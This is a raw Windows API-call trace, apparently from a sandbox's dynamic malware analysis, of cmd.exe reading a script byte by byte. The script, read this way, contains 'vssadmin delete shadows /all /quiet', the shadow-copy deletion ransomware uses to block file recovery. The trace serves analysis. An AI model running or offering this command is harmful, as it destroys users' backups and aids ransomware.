lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.913] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.913] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0267.913] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.913] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.914] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.914] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.914] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0267.914] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.915] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.915] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0267.915] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.915] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.916] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.916] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.916] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0267.916] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.917] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.917] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0267.917] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0267.917] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.917] GetFileType (hFile=0xe8) returned 0x3 [0267.917] _get_osfhandle (_FileHandle=0) returned 0xe8 [0267.917] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0267.917] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.917] GetFileType (hFile=0xf4) returned 0x3 [0267.917] _get_osfhandle (_FileHandle=1) returned 0xf4 [0267.917] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0267.917] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1cf4c8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf4c8*=0x24, lpOverlapped=0x0) returned 1 [0267.917] GetProcessHeap () returned 0x220000 [0267.917] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x241010 [0267.917] GetProcessHeap () returned 0x220000 [0267.917] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x220000) returned 1 [0267.917] GetProcessHeap () returned 0x220000 [0267.917] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x239840 [0267.917] GetProcessHeap () returned 0x220000 [0267.917] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x22) returned 0x234630 [0267.918] GetProcessHeap () returned 0x220000 [0267.918] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x240090 [0267.918] GetConsoleOutputCP () returned 0x4e3 [0267.918] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0267.918] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0267.918] GetConsoleTitleW (in: lpConsoleTitle=0x1cf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.918] GetProcessHeap () returned 0x220000 [0267.918] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x23aae0 [0267.918] GetProcessHeap () returned 0x220000 [0267.918] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x5a) returned 0x239a50 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x420) returned 0x23b9a0 [0267.919] SetErrorMode (uMode=0x0) returned 0x0 [0267.919] SetErrorMode (uMode=0x1) returned 0x0 [0267.919] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x23b9b0, lpFilePart=0x1ced10 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ced10*="system32") returned 0x13 [0267.919] SetErrorMode (uMode=0x0) returned 0x1 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b9a0, Size=0x4a) returned 0x23b9a0 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b9a0) returned 0x4a [0267.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0267.919] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x104) returned 0x235bb0 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1f8) returned 0x23ba00 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23ba00, Size=0x106) returned 0x23ba00 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23ba00) returned 0x106 [0267.919] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0267.919] GetProcessHeap () 